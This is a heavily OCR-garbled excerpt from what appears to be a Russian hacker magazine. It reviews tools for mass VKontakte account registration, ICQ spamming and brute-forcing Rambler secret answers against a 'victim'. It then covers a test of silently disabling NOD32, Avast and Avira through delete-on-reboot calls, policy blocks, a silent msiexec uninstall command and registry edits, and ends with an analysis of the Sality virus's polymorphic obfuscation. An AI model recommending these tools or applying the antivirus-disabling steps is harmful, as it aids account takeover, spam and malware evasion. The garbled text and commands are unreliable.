- многопоточность (до 10 потоков в 
паб лик- версии) ; 

- случайный выбор имен и фамилий из 
соответствующих списков; 

- рандомный пароль или пароль из 
списка; 

- вставка выбранных аватар; 

- обход капчи с помощью сервиса 
апбідабе ; 

- лог работы; 

- поддержка НТТР Ргоху, 8оскз4 , 
ЗоскзБ ; 

- заполнение страниц на 98%. 

Также стоит отметить, что во встроенном 
функционале реггера отсутствует возможность 
подтверждения свежезареганных аккаунтов 
по мылу, но автор с радостью предоставляет 
тебе другую утилиту специально для этой цели 
— многопоточный «Подтверждатель аккаунтов 
для ВК», который ты тоже сможешь найти на на- 
шем диске. Все вопросы и пожелания по работе 
программы оставляй тут: ШрУЛогит.апЦсбаЕ 
гиЛбгеасІ21 9834.ЫтІ . 




/ . ур= 
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Программа: ѴкРипАсІсІегО.З 

ОС : ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 

Ѵіз1а/20085егѵег/7 

Автор: ІОРРЕ 




Вот нарегал ты несколько десятков тысяч ак- 
каунтов ВКонтакте, а что с ними можно делать 
дальше? Для работы со списками такихакков 
существует целая туча специализированного 
софта (многие программы не раз описывались 
на страницах нашей рубрики). ѴкРипАсІсІег как 
раз и является одной изтаких программ. Итак, 
данная утилита служит для добавления втвой 
аккаунтбесконечного количества поклонни- 
ков и обладает следующим функционалом и 
особенностями: 



- акки заносятся в список в виде 
таіі : равзѵгогсі; 

- поддержка апбідабе и ручного ввода 
капчи ; 



- удаление поклонников; 

- лог с автоочисткой; 







- прогрессбар; 

- кнопки «Старт» и «Стоп» . 

Прими во внимание, что рейтинг на аккаунте, 
ккоторомуты хочешьдобавить поклонников, 
должен быть более 200 единиц. 

Р.5. Автор с радостью выслушаеттвои отзывы 
о работе проги здесь: ЬирУЛогит.апбсбаРги/ 
0ігеас1паѵ207277-1 -1 0.ЫтІ . 



Программа: ІССШдМЗрат 
ОС : ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴізІа/2008 5егѵег/7 
Автор: д1ѵѵ2еЗ 

Исключительно ради образовательных целей 
представляю твоему вниманию один из много- 
численных ІСО-спамеров, благодаря которым к 
тебе в шохуломится куча номеров с предложе- 
ниями что-то купить и на что-то нажать :) 
Каквидно из названия, ІСО І_ідЫ:5рат — это 
программа для рассылки спам-сообщений по 
ІСО. Возможности и особенности спамера: 





ІСО-спамер в действии 

- рассылка сообщений по выбранному 
диапазону; 

- максимальное количество символов в 
сообщении — 4000; 

- возможность загрузки сразу не- 
скольких уинов для спама; 

- антибан; 

- подробная статистика; 

- отображение информации по загружен- 
ным и выведенным в онлайн номерам; 

- счетчик отправленных сообщений и 
ошибок отправки; 

- отображение скорости отправки со- 
общений в секундах; 

- работает на . ЫЕТ Егашетлгогк 3.5. 

Если ты все же собрался использовать прогу по 
ее прямому назначению, то помни — мы против 
спама! 

Программа: АЗРВгиІе 
ОС : ѴѴіпсІоѵѵз 2000/ХР/2003 5егѵег/ 
ѴізІа/2008 5егѵег/7 
Автор: д1ѵѵ2еЗ 




На очереди еще одна замечательная про- 
грамма отц1ѵѵ2еЗ, посвященная аськам и 
мыльникам. Итак, А5Р Вшіе (Апзѵѵег Вестей 
ВатЫег Вги1:е] — это брутер секретных ответов 
на ВатЫег.ги (вдругтебе понадобится снять 
красивый номер аськи, который был привязан к 
Рамблеру?). Вотчто умеет данная утилита: 



- работать без проксей; 

- скорость перебора зависит от ско- 
рости интернета (до 50 секретных 
ответов в секунду на 10 Мбит) ; 

- не пропускать «гуды»; 

- сохранять подобранный ответ в 
дооб. бхб ; 

- сохранять неправильные ответы в Ъаб.бхб; 

- брать слова для брута из словаря 
бісб . бхб ; 

- она многопоточна . 



Для начала процесса перебора тебе всего лишь 
необходимо сохранить свой словарь в сіісЕМ, 



запустить прогу, ввести логин жертвы, выбрать 
домен, ввести капчу (вводится один раз) и 
нажать на кнопку «51аг1:». Удачного брута! :) 

Программа: АгхРіпсІег 
ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 5егѵег/ 
ѴізІа/2008 5егѵег/7 
Автор: АгхѴѴоК 




Ищем текст в тысячах файлов 

Давненько на страницах нашей рубрики не появ- 
лялись релизы от команды ѵѵеЬхакер.пеЕ поэто- 
му спешу представить прогу АгхРіпбег— уни- 
кальный инструмент для поиска текста в любом 
количестве файлов. Особенности программы: 

- очень высокая скорость работы; 

- многопоточность + автовыбор пото- 
ков (от 1 до 100) ; 

- обработка любого количества файлов; 

- обработка больших файлов (от 1 Гб) ; 

- малая нагрузка на процессор (при 
обработке 30000 файлов нагрузка со- 
ставляет жалкие 15-20%) ; 

- малое потребление ОЗУ (при обра- 
ботке 30000 файлов потребление ОЗУ 
находится в пределах 14 Мб) ; 

- поиск можно вести как по всем фай- 
лам, так и по одному или группе типов; 

- возможен поиск по регулярным выра- 
жениям; 

- открытие файлов или папок прямо из 
главного окна программы; 

- при выводе результата сразу же под- 
свечивается кусок строки, в котором 
найдено искомое слово; 

- уникальная возможность просмотра 
фрагмента текста, в котором найдено 
слово (то есть не надо будет каждый 
раз открывать один и тот же файл) ; 

- удобные настройки; 

- программу не надо устанавливать (из- 
начально идет всего лишь один файл) ; 

- гарантированная работа на Шіпбохѵз 
7 іЛбітабе, Міпскжз 7 Махітит, 
Міпскжз Ѵізба и Міпскжз ХР. 

Такчто, если среди огромного количества 
текстовиков тебе понадобилось найти мыло/ 
пароль/асю/номертелефона и иже с ними, 
то лучшим решением будет использование 
АгхРіпсІег. 

Р.5. Все вопросы по работе тулзы советую 
постить в топик ЬйрУ/ѵѵеЬхакер.пеіЛогит/ 
5боѵѵ1:ЬгеасІ.рЬр?1=7693 .^г 
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КРАШ-ТЕСТ 

АНТИВИРУСОВ: 

тройная 

пенетрация 

N0(132, Аѵа$1, Аѵіга; проверим 
их на стрессоустоичивость 




Вообще-то мы могли бы читать толстые талмуды про методики 
тестирования антивирусов, делать все по-умному и по правилам. Хотя о 
чем речь? Какие правила? Какие вообще могутбыть правила на войне 
— войне вирусов и антивирусов? Кто сильнее — тоти прав, воти все 
правила. И мы их придерживаемся. Крометого, нам пр осто нравится все 
ломать :). 



Сегодня в нашу краш-лабораторию попали 
три попѵлярныхантивирѵсных программы. 

Первый претендент — это антивирус Е5ЕТ 
N0032 версии 4.2. Он представляет собой 
решение для защиты домашнего компьютера 
от вирусов, троянских программ, червей, 
рекламного ПО, шпионских программ, 
фишинг-атаки руткитов. К достоинствам 
данного продукта можно отнести наличие 
проактивной защиты, точное обнаружение 
угроз, НІР5 (Нозі: Іпіхизіоп Ргеѵепбоп Бузует] 
и высокую скорость работы. 

В роли следующего подопытного выступает 
аѵазН Егее Апйѵігиз. Как понятно из его 
названия, программа совершенно бес- 
платна, благодаря чему снискала большую 



популярность во всем мире. Основными ее 
достоинствами являются защита от рутки- 
тов в реальном времени, технология аѵазК 
ІпІеШдепІ: Зсаппег, а также разнообразные 
модули защиты, которые сами разработчики 
называют «щитами» (щит поведения, щит 
Р2Р/мгновенных сообщений ит.д.]. 

И, наконец, третьим (и последним) анти- 
вирусом, который подвергнется нашим 
краш-тестам, будет Аѵіга АпбѴіг Регзопаі. Со 
слов рекламщиков — это надежная бесплат- 
ная антивирусная программа, постоянно и 
быстро защищающая компьютер оттакого 
вредоносного ПО, как вирусы, трояны, 
Васкбоог-программы, мистификаторы, чер- 
ви, диалеры и т.п. 



ПРИНЦИП ТЕСТИРОВАНИЯ 

Для вновь присоединившихся напомним, что 
и каким образом мы тестируем. Итак, нами 
были разработаны пять ужасных испыта- 
ний. Некоторые тесты представляют собой 
специально написанные мной программы, 
другие можно выполнить вручную с помо- 
щью стандартных инструментов ѴѴіпбоѵѵз. 

Все опыты проводились в ѴѴіпбоѵѵз ХР 
Ргоіюззіопаі 5РЗ. За прохождение каждого 
теста выставляется оценка по пятибальной 
шкале. В конце мы подсчитаем среднеариф- 
метическое всех оценок и посмотрим, кто 
оказался самым стойким. 

Теперь немного о самих тестах. Так как мы 
проводим краш-тестирование, то и испыта- 
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Пользовательский интерфейс N0032. Обновляем базы сигнатур 



ния у нас будут соответствующие. Основная их цель — вывести из 
строя антивирусное ПО как можно более незаметно для пользова- 
теля. Если в результате выполнения того или иного теста защитные 
функции наших «лабораторных образцов» перестали работать, то 
антивирь получает жирную двойку. В противном случае мы будем 
смотреть, как ПО справилось с проблемой. Если появилось хоть 
какое-нибудь сообщение перед смертью, то оно честно заслужило 
как минимум тройку. 

И еще несколько слов о каждом испытании в отдельности. Первый 
тест будеттупо пытаться удалить самые важные бинарные файлы 
дистрибутива антивируса. Но не просто удалить, а удалить во время 
загрузки ОС с помощью специальной АРІ-функции. Второй будет 
делать то же самое, но при этом хитро шифровать имя удаляемого 
файла, чтобы антивирь не догадался, что его хотят стереть с родного 
жесткого диска. Третий тест опять-таки удаляет жизненно важные 
файлы, но при этом скрывает этот факт, маскируя вызов смерто- 
носной АРІ-функции под совершенно безобидный код. Четвертое и 
пятое испытания стоят особняком, поскольку выполняться они будут 
с помощью стандартных средств ОС ѴѴіпсІоѵѵз, никаких специаль- 
ных утилит мы писать не будем. Разумеется, при желании все это 
дело можно реализовать программно. Итак, один из тестов будет 
запрещать запуск антивируса по средствам политик безопасности, а 
второй попробует деинсталлировать ПО без лишнего шума и пыли. 
Ну а теперь, когда все нюансы оговорены, краш-тесты готовы к 
запуску, а антивирусы трясутся от страха, как первокурсники перед 
экзаменом, приступим к самому интересному. 

ТЕСТ №1 

Первый тест будет проделан средствами специально написанной 
утилиты. В командной строке мы передадим ей полное имя файла, 
который хотим удалить при следующей загрузке ОС. Программа 
вызовет системную функцию МоѵеЕіІеЕх; эта функция может пере- 
мещать файлы и папки. Если в качестве второго параметра передать 
ІМІІІХ, а третьим — флаг МОѴЕЕІЕЕ_ОЕЕАѴ_ІЛ\ІТІЕ_ВЕВООТ, то файл, 
путь к которому должен быть прописан в первом параметре нашей 
чудо-функции, будет безвозвратно удален после перезагрузки ОС. 
Код программы настолько прост, что его осилит даже самый неради- 
вый хакер. 

Теперь посмотрим, как все это переживут наши антивирусы. Если 
запустить N0032 и посмотреть в диспетчер задач, то можно увидеть 
два процесса: едиі.ехе и екгп.ехе. Первый запущен с правами теку- 
щего пользователя, а второй — с привилегиями системы. Вот их-то 
мы и попытаемся удалить. Запускаем утилиту для удаления, указав 
нужные файлы и перезагружаем компьютер. После перезагрузки 
антивирус успешно запустился. Тест пройден, причем на пять, пос- 
кольку N0032 тихо и спокойно предотвратил попытку собственного 
удаления с жесткого диска пользовательской машины. 




Аѵіга в действии 



Но у нас осталось еще два претендента на звание самого стойкого. В 
случае с аѵазі: мы будем атаковать файлы аѵазізѵс.ехе и аѵазгиі.ехе, а 
с Аѵіга АпЕѴіг — аѵдпЕехе, аѵдиагб.ехе, аѵзбасіоѵѵ.ехе. Запускаем тест, 
делаем ребут и... оба антивируса как новенькие. И аваст, и авира 
справились на пятерку. Никаких лишних сообщений, заставляющих 
пользователя делать выбор, никаких намеков на сбой в работе. Все 
справились на «отлично». 

ТЕСТ №2 

Второй краш-тест практически полностью повторяет первый, но с од- 
ним-единственным отличием — путь кудаляемому файлу мы передаем в 
зашифрованном виде. Процедура шифрованиятоже не совсем простая. 
Мы используем специальный трюк, чтобы обмануть эвристики испытуе- 
мых антивирусов. Этоттрюкбыл хорошо описан в прошлой статье, поэтому 
возвращаться к нему мы сейчас не будем. Скажулишь, что основан он на 
алгоритме генерации ключа криптования, который не можетбыть проана- 
лизирован эвристическими движками. 

Приступим к испытанию. Атаковать мы будем веете же файлы, что и в пер- 
вомтесте, предварительнозашифровав их полные имена. N0032 опять 
героически выдерживает нападение на свои ехе’шники. После перезаг- 
рузки он все также радует нас своей замечательной иконкой втрее. Авот 
аѵазі:! Егее Апбѵігиз и Аѵіга АпбѴіг Регзопаі, ксожалению... Ксожалению, и 
они выдержали это нападение. Всем пятерки. Это отвратительно. 

ТЕСТ №3 

Третье испытаниетакже будетудалять нужные для антивирусного ПО 
файлы, но при этом будет маскировать сам факт попытки удаления. 

Для этого при вызове функции МоѵеЕіІеЕх мы будем маскировать флаг 
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Установка Аѵіга АпііѴіг Регзопаі 



МОѴЕРІЬЕ_ОЕІ_АУ_1)МТИ_РЕВООТ р который красноречиво заявляет о на- 
ших намерениях. Маскировка, а точнее — шифрование этого параметра, 
будет осуществляться с помощью все того же трюка с генерацией ключа, 
не поддающегося эвристике. Проверку на прочностьопять начинаем с 
ЫСЮ’а. Запускаем утилиту для теста, предварительно не забыв указать 
пути кфайлам, которые должны быть стерты с поверхности диска. Жмем 
кнопочку рестарта системы. Экран потух и сразуже загорелся. Системный 
динамиктихо пикнул. Побежала строка загрузки старой доброй ѴѴіпсІоѵѵз 



Почему все так хорошо справились? 



Основная причина, по которойза первыетри теста всеантивирусы по- 
лучили по пятерке, заключается втом, что они защищаютсвои файлы 
с помощью своихже драйверов-фильтров ФС. Все попытки записи, 
удаления или изменения бинарников, входящих в состав антивируса, 
жестко пресекаются науровнеядра, что недаетни единого шанса 
испортить работуантивиря изтретьего кольца. 

Тоже самое и с шестым испытанием. Драйвер слежения за реестром 
просто запрещает какие-либо опасные действия в отношении ключей, 
которые связаны с работой антивируса. Делается это тоже в нулевом 
кольце ОС, поэтому обычными методами реестр испортить нельзя. 
Проверить, кто же мешает провести диверсию, очень просто — до- 
статочно загрузиться в 5абе тобе и проверить, удаляются ли нужные 
файлы и ключи реестра. В безопасном режиме«лишние» драйвера 
не грузятся, что дает возможность беспрепятственно разобраться с 
антивирусом. 



Александр Зккерт, постоянный автор, 
враг антивирусов и повелитель 
нулевого кольца 



Позволю себе прокомментироватьтолько одну ситуацию — возьмем, 
к примеру, ту организацию, где я работаю. Хотя, если честно, она будет 
справедлива, наверное, для 95% всехорганизаций вообще. Итак, 
порядка 100 машин, не больше, половина изнихимеютпостоянный 
доступ в сеть, доступны обновления, почти везде стоят а веры, втом 
числе и у команды админов (в их число я не вхожу). И что? Да у настут 
прямо вирусный зоопарк, если честно. Мне как-то флешку принесли 
с документами, на которой оказалось чуть больше 1 ,5кэкземпляров 
од н о го и то го же в и руса . 

Атеперьсмотрим на ситуацию сверху — что можноувидеть? Везде 
стоятвирусы, файерволы, проактивки, НІРЗ'ытам всякие, а вирусы как 
чувствовали себя как на курорте, та к и чувствуют. Это просто бизнес, 
господа. 




А вот и защита аѵазі! от несанкционированного удаления 



ХР. И вотуже радостное «ѴѴеІсоте» на приятном синем фоне сообщает 
нам отом, что через несколько секунд мы узнаем отом, что сталось с 
N0032. Ас ним ничего и не произошло. Работает, какчасы. Ноу насеще 
остается надежда на Аваст, или хотя бы на Аѵіга АпбѴіг. В третий раз 
проделываяужехорошознакомые нам операции, мы ждем загрузки ОС. 
Ито, что мы видим, повергаетнас в полное уныние. Они оба, и аѵазі:!, и 
Аѵіга, работают как ни в чем не бывало. Неужели все опять заработали по 
пять баллов и мы никому не влепим даже жалкой троечки, не говоря ужео 
большой и жирной двойке? Похоже, наша краш-лаборатория медленно, 
но верно переквалифицируется в салон красоты для котят. Одно радует — 
впереди еще естьтесты. 

ТЕСТ №4 

Следующий тест мы будем проводить с помощью стандартных инструмен- 
тов ѴѴіпбоѵѵзХР Ргоіеззіопаі. Для этого в главном меню системы нужно вы- 
брать пункт«Выполнить...» и вписать туда следующее: дресІіЕтзс. Откроет- 
ся консоль с групповыми политиками. Далее следует кликнуть по элементу 
«ІІзегСопТідигабоп», затем «АбтіпізФабѵеТетрІаІез», «Бузует». После 
чего справа мы увидим «ОопЧ пт зресібеб ѴѴіпсІоѵѵз арріісабопз». Эта 
опция позволяетзапретитьзапускопределенных программ, основываясь 
на имени исполняемого файла. Своей очереди ждет N0032. В политиках 
винды мы пропишем два исполняемых файла: едиі.ехе и екгп.ехе. Еслиу 
нас не получилось ихудалить.то попробуем хотя бы помешать им загру- 
зиться. После нажатия кнопочки ОК и перезагрузки компьютера терпеливо 
ждем. 00 уже загрузилась, но значка антивируса не видно. Подождем еще 
минутку, возможно, это просто тормоза... Однако, ни через минуту, ни через 
две антивирус таки нестартовал. Победа? Заглянем в диспетчер задач. 

К нашему глубокому сожалению, процесс екгп.ехе все-таки был запущен, 
но вот пользовательским интерфейсом нигде и не пахнет. Троечка. Цепь 
победантивирусов прервана. Но не будем забывать и о других. Аваст по- 
вел себя практически также, каки N00 — запустиласьтолько системная 
служба, а вот прикладные пользовательские программы не стартовали, 
то есть нетзначка втрее, и не видно никаких окон. Недалеко ушел и Аѵіга 
АпбѴіг. Картина идентична двум предыдущим. Всем потрояку. Наша 
самооценка потихоньку начинает расти, ведь нам все-таки удалось 
сломить эти творения антивирусной индустрии. 



Лозовский Александр, редактор 
рубрики «Маіѵѵаге» 



Ну, что, хорошее дело. То, что мы смогли вчистую деинсталлировать 
один популярный и небесплатный антивирус и лишить гуя парочку 
других, очень радует. В конце концов, у каждого из этих продуктов за 
спиной несколько летэволюции и большая команда довольно высоко- 
интеллектуальных разработчиков, которые неутомимо работают над их 
защитой. То, что нам все же удалось ее (эту за щиту) подточить, да еще 
такими несложными способами, можно считать достойным результа- 
том. Разработчикам антивирусов будет над чем подумать 
и что усовершенствовать в следующих версиях своих продуктов. 
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Процедура удаления аѵазі! Апііѵігиз Ргее на первый взгляд 



ТЕСТ №5 

Пятой будет попытка полного удаления защитного ПО с помощью штатного 
и н ста л л ято ра . Удал ять м ы буде м та к, что б ы п ол ьзо вател ьничегонезаметил. 
Праетическиу всех современных инструментов для развертывания прило- 
жений в системе естьтак называемый «тихий режим», когда пользователю 
не задается никаких лишних вопросов. Вотс помощью этого режима мы и 
будем проводить диверсию. Начнем с N0032. Установка и удаление ІМСЮ’а 
выполняется с помощью стандартного майкрософтовского инсталлятора. 
Для тихого удаления нужно выполнить команду, похожую на эту: 

тзіехес /диіеС /ипіпзСаІІ { 1А59064А-12А9-469Р-99Р6- 
04ВР118БВСРР} 

Разумеется, предварительно подставив в нее нужный С ВІЮ. Через минуту 
компьютер перезагрузится и отантивируса не останется и следа. Словац- 
кий антивирус получаетзаслуженную двойку, нельзя же та к просто дать 
себя удалить из системы! 

Для анынсталла аѵазі:! Ргее Апбѵігиз использует собственный модуль. 
Вызывается он более чем странно: 

С:\Ргодгаш Рі1ез\АІѵ\п_1 ЯоРРѵ/аг^Х Аѵа я В 5 \ а яюКппР ІШ. ехе 
"С : ХРгодгат РіІевХАІтоіІ 8оРЦ^аге\АѵазС5\Зе1іир\зе1:іРасе . 
сШ" КшіЗеСир. 

Все наши попытки запуститьтихий режим окончились неудачей. Но даже 
если бы намудалосьскрытьокноудаления программы, то пользователь 
бы увидел это (см. картинку). 

За такую бдительность аѵазі: получаеттвердую пятерку. А что же с Аѵіга 
АпРіѴі г Ре гзо па I? И н ста л л ято р у это го а нти в и руса тоже са м одел ьн ы й и 
никакими законными методами скрытый режим удаления мы отыскать не 
смогли. То есть, вроде бы можно поставить и пятерочку, но после аваста 
рука не поднимается — а вдруг кто-то сообразит, как скрыто запустить про- 
цесс анинсталла? Поэтому я предлагаю всадить Авире четверочку. Чтобы, 
значит, стремился клучшему. 

ТЕСТ №6 

Да, мы обещали всего пять тестов. Но слишком хорошие результаты 
проверки антивирусов не давали нам покоя, и мы решили устроить 
им еще одно испытание. Сейчас мы будем искать ключи реестра, 
ответственные за запуск антивируса, и пытаться их удалить. N0032, 
как и все уважающие себя антивирусы, раскинул свои щупальца 
по всей системе. У него есть собственный драйвер для мониторин- 
га обращений к файловой системе и реестру ѴѴіпсІоѵѵз. Также им 
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Удалить НОД оказалось проще всего 




постоянно запущена служба, которая осуществляетуправление 
драйвером и модуль III, который стартует при запуске ОС и служит 
для общения с пользователем. Все эти компоненты прописаны в 
системном реестре. Например, службы и драйверы живут вот в такой 
ветке: НКЕУ_ІОСАІ_МАСНІМЕ\5У5ТЕМ\Соп1го[5еШ01\5егѵісез\. 
Попробуем помешать старту службы екгп.ехе, удалив подключ екгп, 
который находится в вышеуказанной ветке реестра. Жмем кнопочку 
Иеі на клавиатуре и в ответ получаем безрадостное Ассезз бепіеб. С 
драйвером та же история. Но мы не отчаиваемся и пробуем сломать 
хотя бы запуск 111-части. Для этого идем в НКЕУ_ЕОСАЕ_МАСНІІ\ІЕ\ 
ЗОЕТѴѴАРЕ\Місго50Іі\ѴѴіпсІоѵѵ5\Сиггеп1:Ѵег5Іоп\Рип и находим там 
параметр, ответственный за запуск едиі.ехе. Удаляется этот параметр 
очень даже хорошо, и мы радостно перезагружаем компьютер. После 
старта ОСиконкаЫОО’ав трее не появилась. Цель достигнута, хоть и 
с небольшими оговорками. Е5ЕТ N0032 получаеттройку. Следующий 
посписку — аѵазі: . Все важные для запуска параметры находятся в 
тех же местах, что иуІМСЮ’а.Нои удаление ключей, ответственных за 
старт службы и драйвера, также оканчивается неудачей. Да и, к тому 
же, отключить автозагрузку Ш-части антивируса нам тоже не уда- 
лось. Аваст получает пятерку. Аѵіга АпЛѴіг повел себя точно также, 
как и N0032 — записи реестра, служащие гарантией загрузки служб 
и драйверов, остались неприкосновенны, а вот стандартный а втора н 
был безжалостно удален из реестра. Авира получаеттроечку. 

ИТОГИ 

Испытания закончены. Всеантивирусы, кнашемусожалению, показали 
себя достаточно хорошо. Лучшим оказался аѵазі:! Егее Апбѵігиз набрав 
4,7балла. На втором месте Аѵіга АпбѴігРегзопаІ — 4,2 балла. Изавершает 
список Е5ЕТ N0032 сжалким результатом в 3,8 балла. Жаль, жаль. Ну, ни- 
чего, в следующий раз мы придумаем еще более бесчеловечные способы 
и обязательнотебя с ними познакомим. т 
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■ За ко рже в с кий Вячеслав, старший вирусный аналитик «Лаборатории Касперского» 



Точка входа 



псевдокод 


компиляция 

— ► 


машинный 






код 



обфускация 



обфусцированный 
машинный коде 
добавлением РакеАРІ 



добавление 



антиэмуляции 



обфусцированный 
машинный код 



Неабег 



Секция 

кода 



Другие 

секции 



Оригинальный 

файл 



СХЕМА, ОТРАЖАЮЩАЯ АЛГОРИТМ РАБОТЫ ПОЛИМОРФНОГО ГЕНЕРАТОРА 



Точка входа 



Процесс 



заражения 



Неабег 

’ Стартовый 
код вируса 



> Секция 
кода 



Другие 

секции 



Новая 
секция с 
основным 
телом 
вируса 



Зараженный 

файл 



СХЕМАЗАРАЖЕНИЯ РЕ - ФАЙЛА ВИРУСОМ Ѵігиз.ѴѴіп32.5аІіІу.аа 



ЮРЕПАРАЦИЯ: 

ВСКРЫВАЕМ ХИТРЫЙ 8АИТУ.АА 

Учимся распознавать полиморфизм и обфускацию кода 
на примере известного вируса 



Наш сегодняшний разбор будет посвящен полиморфному генератору 
инструкций, применяемому в известном вирусе Ѵігиз.ѴѴі п32.5а Іііу.аа . 

Он позволяет получать различный обфусцированный код с применением 
РакеАРІ при каждом его использовании. 



Но и это еще не все. Если честно, на эту ста- 
тью у нас большие планы, ведь в ней мы рас- 
смотрим тонкости формирования х86- инс- 
трукций - префиксы, опкоды, поля МобРМ, 
51В, и опишем признаки, по которым можно 
отличить обфусцированный и потенциально 
зловредный код от стандартного, сгенери- 
рованного обычным компилятором. Также не 
останутся без внимания общие схемы работы 
обфускатора и непосредственно генератора 
кода. 



Для начала рассмотрим сам вирус. Самая 
первая модификация Ѵіги5.ѴѴіп32.5аШ:у 
- «а» - появилась еще в 2003 году, а одна 
из последних, модификация «аа» - в июле 
2008 года. В течение пяти лет было выпу- 
щено немало версий, но в них было мало 
качественных изменений и они не получили 
широкого распространения. А вот экземпляр 
Ѵіги5.ѴѴіп32.5а Ііііу.аа получился на редкость 
«удачным» - он отлично распространяется 
и обходит антивирусы. С момента своего 



выпуска он занял лидирующие позиции в 
рейтингах вирусной активности и остается в 
них вплотьдо настоящего времени. Основ- 
ной его функционал - заражение РЕ-файлов, 
распространение с помощью съемных носи- 
телей, скачивание и установка ВаскОоог’а. 
Именно этот зловред является отличным 
примером для разбора. Он в полной мере 
полиморфен, код его сильно и качественно 
обфусцирован, а также снабжен антиэму- 
ляцией на основе вызова АР I -функций. 



► 076 
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Полиморфизм отлично проявляется при заражении файлов - каждый 
раз генерируется совершенно разный код, но, в целом, он обладает 
идентичной функциональностью, при этом в файле присутствует 
статичная область кода, которая зашифрована, опять-таки, всегда 
по-разному. 

Обфускация реализована практически идеально - то, что можно 
исполнить с помощью четырех-шести инструкций, растянуто на 
0x300-0x400 байт кода. Статический анализ дизассемблерного 
листинга сопряжен, по понятным причинам, со значительными труд- 
ностями, а применение РакеАрі позволяет легко обойти некоторые 
эмуляторы. Конечно, существуют и другие вирусы с аналогичной 
«начинкой», но большинство из них являются так называемыми РоС 
(Ргооб об Сопсері:) и не получили широко распространения. Отличным 
примером такой модели является ЕРО (Епігу Роіпі ОЬзсигіпд) - вирус 
Ѵіги5.ѴѴіп32.2отЬіе. 

Теперь о самой технике заражения. Весь процесс показан на схеме. 
5а [Ту заменяет оригинальный код приложения, расположенный 
по точке входа, на свой собственный, сгенерированный «на лету». 
Подробнее о нем будет написано ниже. Также в начальный файл 
добавляется дополнительная секция с полиморфным декриптором, 
который во время исполнения расшифровывает и исполняет «по- 
лезную нагрузку» вируса. Генератор в обоих случаях используется 
одинаковый, вследствие чего при беглом просмотре код получается 
практически идентичным. Расположение самой точки входа остается 
неизменным. Атрибуты последней секции задаются таким образом, 
чтобы в ней можно было читать, писать и исполнять. Оверлей исход- 
ного файла «отодвигается» в конец. Таким образом, если инсталля- 
тор с данными в оверлее подвергнется заражению, то его функцио- 
нальность сохранится. 

Схема заражения РЕ-файла вирусом Ѵіги 5 .ѴѴіп 32 . 5 аІі*у.аа 

Перейдем непосредственно к генератору. В его задачу входит фор- 
мирование кода сзаданными свойствами, определенного размера и 
выполняющего заданный псевдокод. Так каким же образом работает 
генератор? В общем случае алгоритм выглядит следующим образом: 

Он в полной мере полимор- 
фен, код его сильно и ка- 
чественно обфусцирован, 
а также снабжен антиэму- 
ляцией на основе вызова 
АРІ-функций 

Схема, отражающая алгоритм работы полиморфного генератора 

Поясним приведенную схему. На самом начальном этапе генератор 
получает на вход так называемый псевдокод, который содержит 
логику исполняемого фрагмента. Псевдокод представляет собой 
совокупность команд, отражающих определенную функциональность 
и понятных для человека. Далее происходит компиляция, причем по- 
лученный машинный код получается каждый раз разными способа- 
ми. В этом и заключается полиморфизм. После этого машинный код 
подвергается обфускации, опять-таки с использованием генератора 
случайных чисел. И начатое дело завершается добавлением одной 
или нескольких фэйковых АРІ-функций в код. Каждый этап по-своему 
интересен и будет рассмотрен довольно подробно прямо сейчас. 
Выше было написано, что в 5аШ:у формируется две области, содер- 
жащие сгенерированный код. Они располагаются по точке входа и в 
начале новой секции, добавленной вирусом. Вся работа генератора 



будет пояснена на первом участке. Второй обладает богатой функ- 
циональностью, в отличие от первого, и будет слишком сложным для 
разбора. Итак, на схеме этот фрагмент называется «стартовый код 
вируса». Псевдокод стартового участка вируса довольно прост. Вот 
его логика: 

• Сохранить оригинальные значения регистров и флагов; 

• Получить ѴА текущего; 

• Вычислить ѴА перехода; 

• Выполнить переход по вычисленному ѴА. 

Третий и четвертый этапы, в отличие от первого и второго, реали- 
зуются в 5аШ:у множеством способов. В последних используются 
соответственно инструкции РС5НА0 и САИЕ. Вызов РП5НА0 нужен, 
чтобы сохранить исходное состояние процессора, и чтобы перед 
тем, как передать управление оригинальной программе, можно было 
вызвать инструкцию РОРАР, восстанавливающую оригинальные 
значения регистров. А вызов команды САЕЕ, помимо выполнения 
перехода, кладет в стек виртуальный адрес (ѴА) следующей инс- 
трукции. Для вычисления адреса перехода используется значение, 
полученное на втором этапе. Способов вычисления очень много. 
Приведем некоторые из них (будем считать, что адрес, полученный 
на втором этапе, располагается на вершине стека): 



РОР КЕС; 




ЗБВ КЕС, 


ІММ; 


МОѴ КЕС , 


[ЕЗР] ; 


АББ КЕС, 


ІММ; 


АББ [ЕЗР] 


| , ІММ; 


РОР КЕС; 





В приведенных выше примерах и далее по тексту под Р ЕС подразу- 
мевается любой 32-битный регистр общего назначения, а под ІММ 
- числовое значение любой размерности. Самый последний этап 
(четвертый) также может быть выполнен по-разному (считаем, что в 
ВЕС находится необходимый 5аІі[у адрес назначения): 

БМР КЕС; 

САЬЬ КЕС; 

РБЗН КЕС; 

КЕТЫ; 

Совмещая все возможные варианты каждой из операций, можно 
получить довольно большое количество исполнений такого простого 
алгоритма. Однако без применения обфускации назначение полу- 
ченного кода весьма очевидно при просмотре дизассемблерного 
листинга, чего не скажешь об «обработанном» коде. На скриншотах 
приведен полный уча сто к ста ртов о го кода вируса, начиная сточки 
входа зараженного файла: 

Стартовый код Ѵіги5.ѴѴіп32.5аІі[у.аа в зараженном файле 
Теперь перейдем кобзору обфускации. Каквидно из дизассемблерных 
листингов, представленных на иллюстрациях, большинство инструк- 
ций не несут полезной нагрузки, а добавлены только для того, чтобы 
усложнить анализ. Красными овалами выделены инструкции, соот- 
ветствующие всем этапам псевдокода. В данном файле вычисление 
адреса для перехода реализуется аж семью командами. 

Сам обфускатор работает в несколько этапов, получая на входе 
определенные параметры, задающие возможный вид получаемой 
команды, а на выходе - готовую инструкцию: 

генерация опкода из списка (одно- или двух- байтовый 

опкод) ; 
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Суровая красота исходного кода. Ниже мы разберем его в подробностях 



генерация байта МобКМ; 

добавление произвольного числового операнда; 
добавление префикса к полученной инструкции. 

Этапы 2-4 опираются на результат первого. Так, не для всех опкодов су- 
ществует байт МобВМ и числовой операнд. Не к каждой инструкции мож- 
но безболезненно добавить префикс. Генератор работает не полностью 
случайно. У него есть определенный списокопкодов, которые он может 
использовать и, соответственно, возможные варианты байта МобВМ. Ге- 
нератор, например, неустанавливаетполе Моб равным 3 для инструкции 
бЕА. Для того, чтобы объяснить назначение всехупомянутых полей и само 
устройство элементарной инструкции процессора х86, обратимся к пер- 
